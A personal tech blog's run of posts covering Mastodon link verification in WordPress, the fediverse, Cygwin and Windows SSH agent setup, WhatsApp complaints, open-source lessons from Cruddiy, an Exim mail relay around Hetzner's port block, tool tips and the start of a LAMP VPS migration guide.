    I found a tutorial that only works with a newer version of Gutenberg (in anticipation of a 2023 WordPress release). But there is also another — easier — way.

    When you run a regular WordPress 6.1 site, this is how you do it.

    I link to my social media profiles from a menu. My guess is that most people want to use it like this. And one of these links in my menu is a Mastodon link. This is the link where you need to add the me value for the rel attribute.

    These are the steps:

    1. Select Appearance
    2. Select Menus
    3. Select your specific Menu (in my case Social Footer Menu).
    4. Select Screen Options
    5. Checkmark the Link Relationship (XFN)
    6. Add the value me to your menu item under Link Relationship (XFN).
    7. Save!

    Step 5 is the trick. This step will add an extra — otherwise hidden — option field to your links.

    I got this tip from here.

    Now you just have to wait for your Mastodon instance to check your links. This happens periodically (I would say daily?). But I notice you can also trigger this check by (making a change and) saving your Mastodon profile.

    And that’s it.

    Look how green!


  • Welcome to the Fediverse

    Welcome to the Fediverse

    It was 2017 when I signed up for the Dutch instance of Mastodon. The newfangled thing. But it wasn’t until last week that it *clicked*.

    It clicked for two reasons.

    Forget the Metaverse

    Mastodon is part of the fediverse. Meaning it shares the core principles of the fediverse. With a little bit of reading, I got a better understanding of what the fediverse actually is, and how Mastodon fits in.

    https://axbom.com/fediverse/

    The idea is as old as it is clever. And it really is clever.

    Technically the fediverse “is a collection of community-owned, ad-free, decentralised, and privacy-centric social networks“.

    Let’s expand the explanation with an emphasis on what this means for a user:

    The fediverse is a collection of community-owned, ad-free, decentralised, and privacy-centric social networks where a user can create a personal account on any specific instance but can connect to everyone else on every other instance.

    Distributed instances is the key idea here.

    The fediverse has many applications. There even is a reading sharing application (why didn’t I think of this?). But for now let’s focus on Mastodon. The fediverse microblog equivalent. Every user on any Mastodon instance can connect to any other user on any other Mastodon instance (mostly). And all these instances are run by different people.

    Just like email

    The best analogy might be email. You can roll your own email server, use your company’s email server, or Gmail or Outlook or what have you. But — and this is important — you can send and receive email to and from anyone with a valid email address.

    Just like you can with a Mastodon address, powered not by SMTP but the ActivityPub protocol.

    The idea is brilliantly simple, and it is how the internet is actually supposed to — and always used to — work and it has lots of upsides.

    Upsides

    Instances are run by individuals or groups who set their own rules. And thus every instance has a unique user experience or feel. There are many specific instances with distinct communities.

    There is (theoretically) no real technical limit to the amount of users an instance can have*, but my guess is that most instances will top off somewhere to keep the instance manageable and moderation feasible. Just like most real life communities.

    Because moderation is done per instance (implicitly by rules, explicitly by blocking users), this makes moderation distributed by default and thus scale-able. Did I mention it was clever?

    *I would like to suggest Dunbar's number to the power of two: 22500 users per instance.

    Open

    Mastodon is open. In the realest sense. And I love the open web.

    Everything on Mastodon is open and uses RSS: accounts, hashtags and more all are expressed as RSS feeds. I just love love love that part.

    The openness comes with great upsides:

    There is no ad-driven algorithm.

    Don’t like the moderation rules on your instance? You can move your account to another instance.

    Want to see the source code? Here you go.

    Want to run your own instance? You do you!

    Momentum

    Apart from not really understanding the fediverse, the other reason it didn’t click in 2017 is because no one I knew was there. Kind of important for a social media platform. But this classic chicken-egg problem got a gigantic kickstart with the recent influx as a result of the exodus from that.other.site. And Mastodon finally seems to have hit critical mass: there are enough people to make it interesting, thus attracting even more people. It really has come alive in the last few short weeks.

    There are lots of curious people checking out the new thing, of course time will tell how many will stick around. And compared to other social media sites, the numbers are still really small, but gaining!

    However, I think the end goal of Mastodon is not (and should not be) necessarily to replace Twitter. Both will most likely co-exist — 44 billion dollars usually doesn’t evaporate just like that. But having Mastodon makes the world that much better, and it gives users a choice.

    I don’t think it is necessarily that people are fed up with the new Twitter leadership (it’s only been a week, right?), but I do believe people are fed up with the Twitter experience in general, drawing them to — finally viable — alternatives like Mastodon.

    And most of these experiences are things that Mastodon implicitly or explicitly addresses. Things like: moderation, accountability, community, ownership and resiliency.

    But I also notice lots of Twitter people — mostly with large followings — are hesitant. I follow quite a few US tech people, and most seem bullish on Musk. Few are not. We’ll see.

    But apart from that there are other challenges.

    Challenges

    Let’s name a few.

    • Usability: Signing on, using Mastodon, understanding the Mastodon/Fediverse idea, finding and adding accounts. It’s not entirely intuitive, and thus a barrier.
    • Performance: call it growth spurts. But most Mastodon instances are suffering greatly at the moment, hindering the user experience.
    • Security: the openness also brings challenges!
    • Twitter: IF (big if) Twitter somehow is able to address some of their issues this would provide a big pull force.

    This all being said the main challenge at this time seems to be:

    • Discoverability: where is everyone, where are interesting accounts, where are the people I know?

    Mastodon needs to do better than sharing spreadsheets for finding interesting accounts. But I do understand that this is the paradox of the open web. Having open, distributed content hinders discoverability (also see: podcasts).

    Either way, the distributed character of Mastodon means it is here to stay. The only way is up for the foreseeable future. It’s pretty great to finally have a real open, distributed application that is not blockchain.

    Eugen Rochko

    I would like to point out something. Mastodon is the project of one person. Started in 2016. Sure, lots of people have latched on since, but to me it is indicative.

    Most revolutions start with one person. They might not be the first or their idea might not be original. But timing, the right decisions and right personality are usually what tip the scales in these types of events. Also see: Linus Torvalds.

    It seems Eugen is a true Mensch. Working many hours a week providing great software for a moderate salary (people working on Google ads make 20 times that).

    https://mastodon.social/@Gargron/109260715240000670

    A person with his talent could easily work somewhere else and make more money. But it is obvious he is not in it for the money.

    And it is obvious he has thought longer and more about certain things than most people.

    If you allow the most intolerant voices to be as loud as they want to, you’re going to shut down voices of different opinions as well. So allowing free speech by just allowing all speech is not actually leading to free speech, it just leads to a cesspit of hate.

    Eugen Rochko in Time

    It’s not just the software that makes the difference. It’s the people making the software that do.

  • Using Windows OpenSSH Agent with Windows Terminal and Cygwin

    I am back to running Windows Terminal + Cygwin, after a stint with MobaXterm. I blogged about it before.

    Why:

    • Windows Terminal is pretty good: it doesn’t get in your way, and it’s fast (*very* important).
    • Cygwin gives me access to grep, awk, vim and much more.

    In the end MobaXterm just had too many quirks. Specifically when changing screens — docking / undocking which I do a lot during the day. However, one thing I really did like about MobaXterm was the integrated SSH agent (MobAgent).

    That part worked really well.

    That was what kept me from switching back to Windows Terminal and Cygwin.

    But I recently found out that Windows 10 comes with its own SSH Agent (?!). That was news to me.

    So I now use the Windows SSH Agent. So, not Pageant or OmniSSHAgent or any other Windows SSH Agent or keychain, because these all have issues (I tried them).
    Also running eval $(ssh-agent) for every new terminal window (that zombies when you close your shell) kind of defeats the purpose of having an SSH agent.

    How?

    First you need to tell Windows to start the OpenSSH Authentication Agent on boot:
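    If you want to do this from an elevated PowerShell prompt instead of the Services GUI, a rough sketch (the service is called ssh-agent):

    Set-Service -Name ssh-agent -StartupType Automatic
    Start-Service ssh-agent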

    PowerShell can tell you if the agent is running:

    Looks good!

    And now comes the tricky part. Using Cygwin AND using this ssh-agent i.e. adding and retrieving keys to and from the agent.

    Of course you can add keys with ssh-add or by adding the -A parameter to the ssh command.

    PS C:\Users\Jan van den Berg> ssh-add.exe .ssh\id_rsa

    But you need to understand this next bit first.

    When invoking ssh in Cygwin you invoke a different ssh client than the default Windows SSH client. One is the Cygwin ssh client, and the other one is the one that comes with Windows. I blogged about this before.

    Spot the differences in this next image:

    These are two different SSH clients

    And here is the secret (that took me way too long to figure out; thanks, ssh -v):

    Only when invoking the latter (ssh.exe) do you get access to the Windows OpenSSH Agent!

    This is especially tricky when you want to specify identity files. Make sure you use the right paths; the Windows SSH client will look in different default locations. Something to consider.

    My workflow now is as follows: I have defined a couple of bash aliases in my Cygwin .bashrc file so when I fire up Windows Terminal (fast) I can jump to a specified SSH host with one or two keypresses — all the while using the correct SSH keypair with a passphrase I only have to enter once per Windows boot! (edit: I assumed it would be per boot, but it seems the Windows SSH agent holds the keys forever, that may actually be too much of a good thing….).

    alias ms='/cygdrive/c/Windows/System32/OpenSSH/ssh.exe -A -i "C:\Users\Jan van den Berg\.ssh\mm-id_rsa" jan@myserver'
  • WhatsApp should really fix these issues

    WhatsApp is my most used app, but its development seems stagnant.

    Which is not always a bad thing for software, but WhatsApp could really improve some things, especially when those improvements seem trivial. Some wishes could even be classified as bugs, which they should really fix.

    In no particular order (for iOS).

    • Multi-select on media search
      When you use the global search (pull down on iOS) and select a category (Photos, Documents etc.) you cannot multi-select on the exposed grid. I use this grid for selecting/deleting stuff. But deleting one thing at a time makes the whole experience rather tiresome.
    • Mass delete media types
      In the same vein: give me a button to mass delete GIFs. Sure they’re fun, but I don’t need to keep them around. Especially Giphy or Tenor GIFs. This probably goes for other media types as well.
    • Search re-index
      When you switch / upgrade your phone and restore a backup, you better pull down on the search bar and enter a search and WAIT for the re-index to finish. Sure I can live with that, but when you forget to do so, you only get to search new chats….(until you switch phones). At least give me a way to kick off the re-index again.
    • More than just starring
      Now I can only star a message. That’s it. I need labels.
    • Move archived chats to somewhere else
      This one is truly baffling. WhatsApp decided to put your archived chats — you know, chats that you don’t need direct access to — at THE TOP OF THE CHATS, and all active and current chats are below the archived chats. Stunning. I accidentally click / tap multiple times per week on these archived chats. Please move them somewhere else.
    • Preview on links!
      What is up with this? This worked fine, then it stopped working, then it worked half, and at the moment when you copy/paste a link, there is no preview. But when someone replies to your link: there is a preview! 🤷‍♂️ Also when you directly post a Twitter URL: no preview. But when sharing the link from the Twitter app to WhatsApp: sure, you get a link preview.
    • More post reactions
      They *finally* added this last week! It keeps chats cleaner and more pleasant. But it seems I can only choose from 5 emojis. I need more!

    I may not be a typical user: my WhatsApp archive dates back 12 years and is around 40GB. I sent 166378 messages and received 573376 messages at the time of writing. I keep pruning larger images/videos, but most chats I want to keep; it’s like a diary for me.

    So maybe my wishes go against what WhatsApp wants to be: a very basic, low-entry one-to-many chat app. But really, I’d happily pay for some of these features, though I guess a pro app (no, not the WhatsApp business app) is out of the question?

  • Reaching 100 stars on GitHub: what I learned from putting code online

    When the pandemic started in early 2020, I needed something to get my mind off things. Frustrated with most database form generation solutions I created Cruddiy and put it on GitHub.

    Two years later Cruddiy reached 100 stars on GitHub. Something which I did not expect.

    We could argue a long time on what a GitHub star as a metric actually represents, but for this post it represents: hey, more than one person had a need for this thing.


    Cruddiy is a small collection of PHP files that you point to your MySQL/MariaDB database and you run it (usually) just once and after a few steps/questions — no coding required — it will generate a set of pretty good looking PHP forms for you — usually one per table. The generated forms have basic CRUD functionality, search, pagination and sorting. The forms are based on Bootstrap and you have seen these forms a million times before. You can use them as they are, or use them as a starting point i.e. scaffolding to further improve on (coding required). And here’s the good part: you can delete Cruddiy when you’re done.

    Cruddiy output

    Simple?

    Most developers reading this will probably now scream: hey, but you can use framework X or framework Y! And yes, this is true and I have used and done all of that. But I do not like installing a ton of dependencies to generate just a few simple PHP files (which they are): and this is more or less always the case. Read the original post for more background.

    So Cruddiy is my attempt to keep things as simple as possible.

    I am allergic to pulling in lots of files and folders that clutter my system, especially when I don’t know what all these files do. So Cruddiy does not use Composer, Laravel, Symfony, Docker, or other dependencies. Nothing of the sort. It’s just plain PHP files, that generate other PHP files.

    Cruddiy was created to scratch my own itch, and I have used it several times since. But judging by the number of GitHub stars and comments and thank yous I received I think it’s an itch for more people. Part of the reason I put it on GitHub is because I spent more time on it than was probably warranted, and I wanted an excuse to warrant the invested time. Cue famous XKCD comic:

    XKCD: Is It Worth the Time?

    So putting the code on GitHub is a way to shave more time off — other people’s time, but still: time.

    Also another XKCD comic comes to mind:

    XKCD: Automation
    This one hits close to home.

    Cruddiy is a small project in every sense — in lines of code, number of commits, number of contributors, and number of GitHub stars — but still, through Cruddiy I experienced the magic of people on the other side of the world finding and using something I created. The internet is amazing.

    Here are some things that I picked up by putting things out there.

    1. Opinions

    Everyone has one, right? I was excited when I received the first patches from a complete stranger and pulled them in, thinking how amazing this was. However, this person was very opinionated about how things should work, which bothered me a bit. And he talked to me like I worked for him. But I didn't pay too much attention to it; I thought maybe this is just how it works?

    But when Cruddiy stopped working correctly and had some other weird bugs I removed most of his code and decided: you can fork Cruddiy however you please, but this codebase here is how I want things. And there is absolutely no obligation for me to pull in your code, especially code that fundamentally changes how things work. (It still bothers me a bit that he proposed to move the code to a different folder. I might still revert this).

    It was a hard lesson because I had already developed a bit more based on his code so reverting wasn’t very straightforward and involved some Git tricks that I never want to use again.

    I still find it weird that I just blindly trusted someone and his opinions, purely because I was so surprised that other people had an actual use for Cruddiy. But if I had kept his changes, Cruddiy would probably have withered (being broken and all) and ended up unusable.

    One of the key takeaways here is: something might be open source, but you still need people to take care of it, e.g. make important decisions for it. It will not survive on its own, because there are too many opinions out there. And preferably that person should be you. This is true for arguably the biggest distributed software project in the world — Linux — right down to a very small project like Cruddiy.

    That being said, the above example was of someone being opinionated i.e. rude. But a lot of people seem to have a strange way of asking for things. Please spend some of your valuable time fixing this and that for me, kthxbye.

    Great ideas! But maybe send a PR?

    2. Audience

    Judging by the level of questions and requests I receive, I noticed the average Cruddiy user isn’t a computer programmer.

    And this is expected, since Cruddiy is a no-code solution.

    I do however find it somewhat baffling that there are people who find their way around GitHub without having a decent understanding of either code or Git/GitHub.

    Case in point: I had contact with someone who had good ideas — and who sent me actual code patches, which I merged. But this person did not know how to use Git or GitHub. Which is … surprising, to say the least!

    This person also asked if I had a Discord server (!?) which he found easier to communicate through than e-mail.

    This tells me a couple of things:

    1. GitHub is much more than a code sharing site, it’s also where people go for solutions sans Google.
    2. There is still so much for GitHub to win: it's not simple enough yet. Make it simpler to use and more people will use it.
    3. Discord is successfully replacing e-mail for some people.

    3. Licensing

    I started Cruddiy under GPL2, because, well why not? Lots of projects use GPL2.

    However, I did some reading and switched to the AGPL-3.0 license, because I think it is important to share changes. That said, I was and still am not sure if Cruddiy fits the AGPL bill: is it really a networked piece of code (isn't everything on GitHub, in a sense, a piece of networked code)?

    I am no license expert and might be wrong about this interpretation, but I see AGPL-3.0 as GPL-3.0 with an add-on.

    The lesson is: think about what license your code should have before putting it out online.

    4. Releases

    This was one of the more surprising learnings. When I pull code from GitHub myself, I always look for the latest commit. But apparently this is not normal?

    Early on I created some tags and based one or two releases on these tags. Just to play around with tags and releases. It wasn't until later, when a user had some weird errors, that I found he was using a very old release. Why? Because it was the only release available and that is where people look! Duh…

    So now I make it a habit to tag commits and release the tag.

    5. GitHub quirks

    There are two:

    1. I noticed I always get a flurry of stars, then nothing for weeks, then again a flurry of stars. Nothing in particular seems to trigger this; it's just strange behavior that might have something to do with GitHub caching.
    2. I have NO idea how people find Cruddiy: there are no Google Analytics. Do they find my blog first and then GitHub, or the other way around? I would have liked a bit more insight into this.

    6. Energy

    Most of the work I put in Cruddiy was at the start (a good chunk of my evenings for a couple of weeks). The project is still only 60 commits old (again: very small). There are many more things Cruddiy *could* do, but which *I* don't need right now. So this means things stay mostly as they are.

    I notice that when people point out bugs, I am driven to fix them. But proactively sitting down and adding new features is not something I do. Maybe I could, but I don't: I need a real use case for it. Last week I added a navbar, which greatly improves the look of Cruddiy, but only because someone showed me he had hacked a navbar on top of Cruddiy, which drove me to incorporate it that same evening.

    7. Looking at your own code

    I am not a professional developer. That is not my day job. So most software projects I embark on are either small or ephemeral. Cruddiy however has forced me to look at code that I wrote up to two years ago, and yes everything they say about writing clear code is true. Here is what I found:

    1. Don’t try to be clever, first and foremost: make it clear. So future you might understand what it is you were trying to do.
    2. Write code as if you’re explaining to someone else (again: that someone else is future you).
    3. Don’t think you don’t need to comment code because it makes sense by itself: comment code!
    4. Fewer lines of code are not always better. Do not trade clarity for conciseness.

    Putting code out there

    I do not feel obliged (anymore) to adhere to every wish out there. But I do want things to work as I promised. So I have to admit it also gives me a bit of anxiety when people run into errors or bugs and I can't take over their keyboard; I have to guess at their config/setup, which bothers me a bit. Just as it bothers me when I try to help people and never hear from them again.

    Also, I don't think I have become a better developer; if anything it may have been detrimental to my skills, since wanting to fix things quickly doesn't necessarily produce the best code.

    But these are all minor inconveniences. They do not outweigh the sheer enjoyment I get from the idea that someone, somewhere out there, is using something I made to help solve a problem.

    So if you have the choice: put your code out there!

  • Windows Terminal + Cygwin

    [UPDATE July 2022: I switched to using MobaXterm which does the job just fine. I don’t like that it is not free/open but I do like that it comes with an integrated SSH agent, which makes life a lot easier]

    I had been a happy WSL1 user for many years, but after switching laptops I more or less had to upgrade to WSL2. Which is the same thing but not really.

    The thing is, WSL2 startup times are annoyingly slow. And I hate slow. Computers have to be fast and snappy.

    So after poking around — many blogs and Github issues — I decided to ditch WSL and move on.

    So I entered the world of terminal emulators and unixy environments, which can be overwhelmingly confusing at times.

    Windows Terminal

    First I settled on Windows Terminal as a terminal emulator. I had already started using this for WSL (which comes with MinTTY by default).

    MinTTY is used *a lot* and many tools are actually MinTTY under the hood. Cygwin also comes with MinTTY by default. And MinTTY is pretty good, however: it has no tabs.

    Windows Terminal is the only terminal emulator I found (on Windows) that does tabs decently! The only other ones I found were ConEmu, which feels a bit less snappy, and cmder (which uses ConEmu, so it has the same problem).

    Once you have tabs, you don’t want to go back.

    Windows Terminal is a native Windows binary, so that might explain that snappy feel.

    So Windows Terminal it is.

    But now, how do I get that Linux feel on Windows? WSL1 was pretty perfect: an almost native-feeling Linux environment.

    There are many alternatives and emulation options (like running VirtualBox or MinGW et al.), but why not go with the good, old, trusty Cygwin? Their tagline is enticing:

    Get that Linux feeling – on Windows

    That sounds good!

    Cygwin

    I knew Cygwin from way back, and I noticed it still hasn’t changed its logical, but somewhat archaic installation procedure.

    Cygwin installs itself in a folder with a bunch of GPL tools recompiled for Windows, to create a hierarchy that LOOKS and FEELS like a Linux environment.

    Fine, whatever.

    As long as I can use grep, rsync, ssh, wget, vim and awk, right?

    And I can. Cygwin makes a whole lot of recompiled GNU tools available for Windows — including the above.

    However, a basic Cygwin installation is pretty minimalistic, so I had to run the installer a few times to get all the software packages I needed (ssh, vim and wget, for example, are not installed by default). This is what makes Cygwin a bit different: you can — and usually have to — rerun the installer to add the packages you need.

    Next I added Cygwin to my Windows Terminal and made it the default. And with ‘added’ I mean I made a Windows Terminal profile that starts the bash.exe program that comes with Cygwin and drops me in the Cygwin homedir (which is actually a Windows path).

    A terminal emulator in itself does nothing except handle input / output; running a shell program like bash enables you to interact with your files (or OS) by sending input signals through the terminal emulator and processing its output signals.

    Cygwin comes with MinTTY by default (of course): if this had (decent) tabs, I’d probably chuck Windows Terminal.

    In Windows Terminal you can click a profile together, which edits a JSON file, but you can also directly edit the JSON if you know what you are doing.
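
    For reference, a minimal profile entry along these lines does the trick. This is a sketch: the exact spot in settings.json depends on your Windows Terminal version, and the Cygwin install path and home directory below are assumptions that will differ per setup.

    {
        "name": "Cygwin",
        "commandline": "C:\\cygwin64\\bin\\bash.exe --login -i",
        "startingDirectory": "C:\\cygwin64\\home\\jan"
    }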

    Windows Terminal: setting Cygwin

    Improvements

    I think I really like that Cygwin keeps everything in one folder and doesn’t mess too much with my Windows installation, or path settings and all that. I think (?) it’s just a folder (pretty portable).

    Two things though.

    Prompt

    Cygwin needs a better looking prompt. Well here you go:

    export PS1="\u@\h:\[\e[1;32m\]\w\[\e[m\] \D{%T}# "

    Try it, you’ll like it. Colors, path, username, time: it has everything! Put it in your .bashrc

    SSH

    I could not figure out why my SSH keys weren’t working when connecting to my server. But when I dropped into verbose mode (ssh -vv) I saw ssh wanted to use keys from C:\Users\Jan van den Berg\.ssh instead of the Cygwin homedir /home/jan/.ssh

    I spent waaaaay too much time thinking about why Cygwin would do this, until I noticed the SSH binary I invoked was the default Windows 10 OpenSSH client, which defaults to looking in the Windows homedir for SSH keys instead of the Cygwin homedir.

    So you have to specifically invoke /bin/ssh (or you can remove the Windows OpenSSH client, or change symlinks, or change paths, whatever works for you).
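
    A quick way to check which ssh your shell actually resolves, and to pin it to the Cygwin one, is something like this (a sketch; the alias line would go in your .bashrc):

    # Show every ssh binary on the PATH, in resolution order
    type -a ssh

    # Force the Cygwin ssh for this shell (put this in ~/.bashrc to make it stick)
    alias ssh='/bin/ssh'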

    Spot the difference, one of these is not like the other.

    The lesson is: be aware that Cygwin is just a bunch of Windows executables, and it will therefore also look in your Windows path.

    Just files

    Conclusion

    I think I am pretty happy with this setup, mainly because it starts almost instantly! And that was the whole point.

  • Bypassing Hetzner mail port block (port 25/465)

    I recently switched my VPS from Linode to Hetzner. I got more CPU, RAM and storage for less money. Pretty good right?

    However, it wasn’t until after I migrated that I found out Hetzner blocks all outgoing port 25 and 465 traffic.

    At least, for the first month, for new customers.

    This means my new server cannot talk SMTP with the rest of the world i.e. my server cannot send mail!

    (Note: you can however connect to mailservers that listen on port 587).

    I can see why they would do this, however this is less than ideal if you have a production server with a couple of webshops.

    So, now what?

    My server cannot send mail itself, but it also cannot connect to a smarthost (a different server that does the mail sending), because smarthosts typically also listen on port 25/465.

    I do however have a Raspberry Pi in my home network. What if I run a mail server on a different port there, say 2500?

    So, my VPS can relay the mail there. But I don’t want my Pi to be connected to the internet and send mail. So then what? Why not relay from the Pi to an actual smarthost. Which smarthost? Well my ISP offers authenticated SMTP so I can relay mail from my VPS to my Pi and from my Pi to my ISP. And my ISP can send the mail to anywhere.

    This could work.

    The setup

    This is what it looks like.

    There are two mail server configurations in place. I use exim4 on Debian and you can easily run dpkg-reconfigure exim4-config to (re)create a valid Exim config.

    This command will (re)create a file which holds all specific Exim configuration: /etc/exim4/update-exim4.conf.conf

    It’s a small and easy to understand file. Here follow the complete contents of both files, for reference.

    Hetzner VPS exim4 config

    dc_eximconfig_configtype='satellite'
    dc_other_hostnames='topicalcovers.com;brug.info;piks.nl;j11g.com;posthistorie.nl;server.j11g.com'
    dc_local_interfaces='157.90.24.20'
    dc_readhost=''
    dc_relay_domains=''
    dc_minimaldns='false'
    dc_relay_nets=''
    dc_smarthost='212.84.154.148::2500'
    CFILEMODE='644'
    dc_use_split_config='false'
    dc_hide_mailname='false'
    dc_mailname_in_oh='true'
    dc_localdelivery='mail_spool'

    Note: use a double colon to specify a mailserver that listens on a different port.

    Raspberry Pi exim4 config

    dc_eximconfig_configtype='smarthost'
    dc_other_hostnames=''
    dc_local_interfaces='192.168.178.135'
    dc_readhost=''
    dc_relay_domains='posthistorie.nl,topicalcovers.com,piks.nl,j11g.com,server.j11g.com,willempasterkamp.nl'
    dc_minimaldns='false'
    dc_relay_nets='157.90.24.20'
    dc_smarthost='mail.solcon.nl'
    CFILEMODE='644'
    dc_use_split_config='false'
    dc_hide_mailname='false'
    dc_mailname_in_oh='true'
    dc_localdelivery='mail_spool'

    For this to work you also need to edit the file /etc/exim4/passwd.client with a valid mailbox name and password:

    mail.solcon.nl:authorizedmailboxname:pa$$word

    Or use an asterisk ( * ) to use the credentials for every mailserver. If you (only) use a smarthost, this is fine.
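
    After editing update-exim4.conf.conf and passwd.client, the config still has to be regenerated and Exim restarted. A minimal sketch on Debian, with a made-up test address:

    # Regenerate the actual Exim config from update-exim4.conf.conf and restart
    update-exim4.conf
    systemctl restart exim4

    # Check how Exim would route an (example) address
    exim4 -bt someone@example.com

    # Watch the relay attempts go by
    tail -f /var/log/exim4/mainlog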

    SPF records

    The above configs are what you need to do on your Hetzner VPS and your Pi. Next, you need to change your SPF records.

    The SPF records tell the receiving mailserver that the sending mailserver is allowed to relay/send mail for a specific domain.

    As you can tell I have multiple domains, so that means editing multiple SPF records. Here is what one SPF record looks like. This is public information; anyone can (and should) look up your domain’s SPF records.

    This is the raw SPF record:

    v=spf1 mx ip4:212.84.154.148 ip4:157.90.24.20 ip4:212.45.32.0/24 ip6:2001:9e0:8606:8f00::1 ip6:2a01:7e01::f03c:91ff:fe02:b21b ip6:2001:9e0:4:32::107 ip6:2001:9e0:4:32::108 ip6:2a01:4f8:1c1c:79a1::1 ~all

    You can see it’s a mix of IPv4 and IPv6. For readability, here is what it actually says.

    MX – All mail for this domain should be sent TO a specific IPv4 or IPv6 address.

    Next: you can see which IPv4 and IPv6 addresses are allowed to send mail for this domain. So where mail is accepted FROM.

    So if my VPS wants to send a mail to @gmail.com it will relay the mail to my Pi, which will happily accept the mail, and will relay it to my ISP mail server, and my ISP mail server will try to deliver the mail to Google Mail. Google Mail however will CHECK if the IP address for my ISP mail server MATCHES the SPF records. If Google finds that the IP addresses from my ISP mail servers are not in the SPF records, it will not accept the mail. But if they match, Google Mail will accept the mail.
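
    You can look up any domain’s published SPF record yourself; dig (from the dnsutils package) does the job, with example.com standing in for your own domain:

    # SPF records are plain TXT records
    dig +short TXT example.com | grep spf1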

  • Ten 2022 Tool Tips

    Ten 2022 Tool Tips

    Here’s a list of software tools I either started using this year or tools I think everyone should be using.

    Bitwarden


    The best password manager. Free if you like, or only $10 per year if you want a few more features or just want to support the project.
    My advice: pay the $10. Bitwarden is the best bargain for a great password manager, and you support the development of new features. It has good browser integration, a slick iOS app and even a CLI.

    My passwords are safer because of Bitwarden.

    Brave Browser


    I started using Brave this year after listening to this. Sure you can rack up crypto (Basic Attention Tokens), but I mostly use it because I don’t like being too tied to Google, but I actually do like Chrome. The great thing is that Brave is Chromium under the hood: so I can have my Chrome extensions! Also Brave has bookmark sync across devices; I need that too (most other Chromium based browsers don’t have that).

    QR Codes

    Don’t call it a comeback.

    QR code for this URL

    QR codes have been around for years, and I’ve always wondered what their use case for personal use might be. Well, that became abundantly clear the last year or so.

    It turned out there is a use case for frictionless, touchless, platform-independent data transmission. Who knew?

    ShareX


    Most people know how to take a screenshot, but ShareX is what you really need: it is excellent!

    I set it up so that with two clicks I can take a screenshot and upload it directly to my server; ShareX then puts the newly created URL and the image itself under my paste button (so if I paste into a textbox I get the URL string, and if I paste into, say, a blog post I’m editing, I get the image). Amazing. I use this tool a lot. Looking at my screenshot folder, I have taken around 1277 screenshots this year.


    Node screenshot

    One thing I have not figured out in ShareX — yet — is how to take screenshots of scrolling (large vertical) pages. But I recently learned another way to do this: open the browser inspector, select a node and take a screenshot of that node. I’ve been using it more than I expected.

    Yes, *this* screenshot was done with ShareX.

    Windows Terminal

    In 2021 I switched from WSL Terminal to Windows Terminal. It has tabs and better zoom scroll support.

    Video speed controller

    Please everyone. Install this extension. I watch a lot of talks online, but most people tend to talk slowly: not anymore with this extension! It will speed up any video content. You can use the mouse menu or the s/d keys to speed up or slow down videos.

    Ain’t nobody got time for this!

    RSS

    Ngl, I strongly believe RSS is the embodiment of how the web should work. An open, platform independent protocol to share information.

    I deeply love RSS.

    As a matter of fact: if your technology does not support RSS, you may be hostile to the open web.

    This is how I experience the web (FreshRSS). Screenshot from today.

    WordPress

    I love, love, love WordPress and I have been using it since 2005. This site runs WordPress, as does my other blog on which I blog daily.

    I’ve published close to 100 blogs this year with WordPress. It never fails.

    When people talk about the features of web3: being something decentralized and where anyone can publish, I think: WordPress! The future is already here.

    Cruddiy/Corbin

    Shameless plug.

    When the pandemic started, I created Cruddiy. At the moment this two dimensional array battering piece of PHP code has undergone many revisions, has 80+ stars on GitHub and received many thank you’s and even a couple of contributions. It’s fun.

    Cruddiy is a code generator, and it does a lot of maybe hard to follow things, but the code it generates is as clean as it comes.

    If you have a MySQL/MariaDB database, Cruddiy enables you to create forms like this, in seconds, without any programming:

    Last month I created Corbin. Which has also been a lot of fun and useful for easily creating self-hosted image albums. A single PHP script, that again — like Cruddiy — generates a clean and portable HTML file. Maybe I should think about creating a generator generator 🤔.

    That’s my list. I am always curious to know your tool tips! Share them in the comment box below.

  • Migrating a LAMP VPS

    I recently switched my LAMP virtual server to a different VPS provider.

    The LAMP server that is serving you this site. So the migration worked!

    Here are the steps, for future reference. Mostly for myself, but maybe you — someone who came here from Google — can use this too. This should work on any small to medium sized VPS.

    Let’s go!

    Lower your DNS records TTL value

    When you switch to a new VPS, you will get a new IP address (probably two: IPv4 and IPv6). And you probably have one or more domain names that point to that IP. Those records will have to be changed for a successful migration.

    You need to prepare your DNS TTL.

    To do this, set your DNS TTL to one minute (60 seconds), so when you make the switch, your DNS change will be propagated swiftly. Don’t change this right before the switch, of course; it will have no effect then. Change it at least 48 hours in advance.
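
    You can check the TTL that resolvers currently hand out with dig (example.com standing in for your own domain):

    # The second column of the answer line is the remaining TTL in seconds
    dig +noall +answer example.com A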

    Set up a new VPS with the same OS

    Don’t go from Ubuntu to Debian or vice-versa if you don’t want any headaches. Go from Debian 10 to Debian 10. Or CentOS 8 to CentOS 8. Or what have you.

    This blog focuses on Debian.

    Install all your packages: Apache, MySQL, PHP and what else you need.

    My advice is to use the package configs! Do not try to copy over package settings from the old server, except where it matters; more on that later.

    This starts you fresh.

    PHP

    Just install PHP from the package. If you have specific php.ini settings, change those; otherwise you should be good to go. Most Debian packages are fine out of the box for a VPS.

    I needed the following extra packages:

    apt-get install php7.4-gd php7.4-imagick php7.4-mbstring php7.4-xml php7.4-bz2 php7.4-zip php7.4-curl php7.4-mysql php-twig

    MySQL/MariaDB

    apt-get install mariadb-server

    Run this after a fresh MariaDB installation

    /usr/bin/mysql_secure_installation

    Now you have a clean (and somewhat secure) MariaDB server, with no databases (except the default ones).

    On the old server you want to use the following tool to export MySQL/MariaDB user accounts and their privileges. Later we will export and import all databases. But that is just data. This tool is the preferred way to deal with the export and import of user accounts:

    pt-show-grants

    This generates a bunch of GRANT queries. Run these on the new server (or clean them up first if you need to: delete old users etc.), so that after you import the databases, all the database user rights will be correct.
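
    A sketch of that flow; pt-show-grants is part of Percona Toolkit (the percona-toolkit package), and the exact flags may differ slightly per version:

    # On the old server: dump all user accounts and privileges as GRANT statements
    apt-get install percona-toolkit
    pt-show-grants --user root --ask-pass > grants.sql

    # On the new server: review/clean up grants.sql first, then apply it
    mysql -uroot -p < grants.sql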

    Set this on the old server; it makes InnoDB do a full, clean shutdown instead of a fast one, which helps with processing later.

    SET GLOBAL innodb_fast_shutdown=0

    Rsync all the things

    This is probably the most time consuming step, my advice is to do it once to get a full initial backup, and once more right before the change to get the latest changes: which will be way faster. Rsync is the perfect tool for this, because it is smart enough to only sync changes.

    Make sure the new server can connect via SSH (as root) to the old server: my advice is to deploy the SSH keys (you should know how this works, otherwise you have no business reading this post ;)).

    With that in place you can run rsync without password prompts.

    My rsync script looks like this, your files and locations may be different of course.

    Some folders I rsync to where I want them (e.g. /var/log/apache) others I put them in a backup dir for reference and manual copying later (e.g. the complete /etc dir).

    #Sync all necessary files.
    #Homedir skip .ssh directories!
